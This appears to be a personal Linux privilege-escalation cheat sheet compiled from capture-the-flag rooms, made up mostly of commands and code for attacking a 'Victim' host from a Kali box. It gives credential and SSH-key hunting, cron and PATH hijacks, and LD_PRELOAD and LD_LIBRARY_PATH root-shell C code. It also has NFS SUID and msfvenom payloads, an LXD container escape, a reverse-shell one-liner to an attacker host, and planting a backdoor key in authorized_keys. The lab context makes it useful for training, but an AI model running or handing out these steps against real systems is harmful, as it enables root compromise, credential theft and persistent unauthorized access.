Linux
Gathering Info
whoami
id
groups
cat ~/.bash_historyuname -aCheck for passwords in environment variables
envFind files
Files owned by your user
Victim
find / -user $USER 2>/dev/nullFiles owned by group
Victim
find / -type f -group $GROUP 2>/dev/nullFind passwords
cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wpconfig.php #Wordpress sites
/home/user/myvpn.ovpn #VPN. Look for auth-user-pass and find file it is pointed to.
find / -type f -name *.bak 2>/dev/null
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/nullVictim
cat ~/.bash_history | grep -i passw
SSH Keys
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsaWeak File Permissions
Readable /etc/shadow
Linux PrivEsc #Weak File Permissions - Readable /etc/shadow
Writable /etc/shadow
Linux PrivEsc #Weak File Permissions - Writable /etc/shadow
Writable /etc/passwd
Linux PrivEsc #Weak File Permissions - Writable /etc/passwd
Cron Jobs
Have permission to overwrite the contents of the file
Change path to a different file since it's not using absolute path
Victim
cat /etc/crontabPossible other places crons are running
Victim
cat /etc/cron.d/*Cron Jobs - File Permissions
Examples
Linux PrivEsc #Cron Jobs - File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
View the contents of the system-wide crontab.
Victim
cat /etc/crontab
There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.
Locate the full path of the overwrite.sh file.
Victim
locate overwrite.shNote that the file is world-writable.
Victim
ls -l /usr/local/bin/overwrite.shCron Jobs - PATH Environment Variable
Examples
Linux PrivEsc #Cron Jobs - PATH Environment Variable
View the contents of the system-wide crontab
Victim
cat /etc/crontabNote that the PATH variable starts with /home/user which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents
overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbashMake sure that the file is executable
Victim
chmod +x /home/user/overwrite.shWait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:
Victim
/tmp/rootbash -pCron Jobs - Wildcards
Examples
Linux PrivEsc #Cron Jobs - Wildcards
View the contents of the other cron job script
Victim
cat /usr/local/bin/compress.sh
Note that the tar command is being run with a wildcard (*) in your home directory.
Sudo/SUID/Capabilities
Run all of these commands then check https://gtfobins.github.io/ . They may give different results
Check what can be run with NOPASSWD
Victim
sudo -lvi
vim
find
python3
SUID / SGID Executables - Known Exploits
Find all the SUID/SGID executables.
Victim
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullSUID / SGID Executables - Shared Object Injection
Linux PrivEsc #SUID / SGID Executables - Shared Object Injection
SUID / SGID Executables - Environment Variables
Linux PrivEsc #SUID / SGID Executables - Environment Variables
SUID / SGID Executables - Abusing Shell Features
Linux PrivEsc #SUID / SGID Executables - Abusing Shell Features (#1)
Linux PrivEsc #SUID / SGID Executables - Abusing Shell Features (#2)
Sudo - Environment Variables
LD_LIBRARY_PATH
Examples
Linux PrivEsc #Sudo - Environment Variables
preload.c - code
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}library_path.c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env_keep options):
Victim
sudo -l
LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Create a shared object using the code located at /home/user/tools/sudo/preload.c.
Victim
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.cLD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Create a shared object using the code located at /home/user/tools/sudo/preload.c
Victim
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp
A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.
Run ldd against the apache2 program file to see which shared libraries are used by the program.
Victim
ldd /usr/sbin/apache2Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.
Victim
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.
Victim
sudo LD_LIBRARY_PATH=/tmp apache2
LD_PRELOAD
Examples
If LD_PRELOAD is set try below then running the script we can run with NOPASSWD
Victim
vi preload.cpreload.c - code
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}Victim
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSEFiles with SUID-bit set
Victim
find / -perm -u=s -type f 2> /dev/null setcap
If setcap is set that is very interesting checkout room. Could lead to priv esc. by setting getcap on other things.
Programs in strange locations
If there is a program running in a user home directory or somewhere strange, it may be worth investigating
Getcap
Victim
getcap -r / 2>/dev/nullpython
If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
Service Exploits
PATH Variables
Examples
Hacker vs. HackerCommon Linux Privesc #Exploiting Crontab
Look at the paths, below is an example of a cronjob. it first looks at /home/lachlan/bin before /bin and /usr/bin. therefore we can change pkill because it doesn't use the exact path in the cronjob. This means we can put a new file called /home/lachlan/bin/pkill with whatever we want and it will run as root.
Victim
cat /etc/crontabPossible other places crons are running
Victim
cat /etc/cron.d/*
Victim(lachlan)
echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod +x bin/pkillAdd path
Example
Common Linux Privesc #Exploiting PATH Variable
If a cron job is not specfiying the full path we may be able to change it to go towards another file.
Before we change the path we can see ls goes to /bin/ls
Now after running the below command ls is now directed to our script.
Victim
export PATH=/tmp:$PATH
Passwords & Keys
History Files
Examples
Linux PrivEsc #Passwords & Keys - History Files
Victim
cat ~/.*history | lessConfig Files
Examples
Linux PrivEsc #Passwords & Keys - Config Files
Victim
cat /home/user/myvpn.ovpnSSH Keys
Copy keys from Victim
Examples
Linux PrivEsc #Passwords & Keys - SSH Keys
Look for hidden files & directories in the system root.
Victim
cat /home/$USER/.ssh/$KEYCopy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.
Kali
chmod 600 $KEY
ssh -i $KEY -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa $USER@$VICTIMAdd Keys to Victim
Examples
Kali
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub 
Victim
echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keysKali
ssh $USER@$VICTIMNFS
Examples
Linux PrivEsc #NFSLinux Privilege EscalationLinux PrivEsc Arena
Option #1
Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
Check the NFS share configuration on the Debian VM.
Victim
cat /etc/exportsno_root_squash is present
Note that the /tmp share has root squashing disabled.
On your Kali box, switch to your root user if you are not already running as root.
Kali
sudo suUsing Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).
Kali
mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfsStill using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash).
Kali
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elfStill using Kali's root user, make the file executable and set the SUID permission.
Kali
chmod +xs /tmp/nfs/shell.elfBack on the Debian VM, as the low privileged user account, execute the file to gain a root shell.
Victim
/tmp/shell.elf
Option #2
Victim
showmount -e $VICTIM
cat /etc/exports
Kali
mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.cnfc.c
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}Kali
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfcVictim
cd /home/ubuntu/sharedfolder
./nfc
Kernel Exploits
Examples
Linux PrivEsc #Kernel Exploits
Writable Files
Files where group permissions equal to "writable"
find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null find / -writable 2>/dev/nullPorts
May be able to find open ports only accessible internally.
ss -ltp
netstat -tuanLXD
Examples
Resources
https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.
Victim
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
idPolKit
Examples: Hip Flask
See if it exists.
Kali
apt list --upgradeable
Check out this room for more details
Monitor Processes
Examples
Victim
ps axfPSPY
script that can monitor linux processes without root access
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81Victim
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32 Docker Breakout / Privilege Escalation
Examples
Copy Material from here:
https://tryhackme.com/room/linprivesc
Automated Enumeration Tools
LinPeas
Room with other things to try
https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc
Other Cheat sheets
https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics
Last updated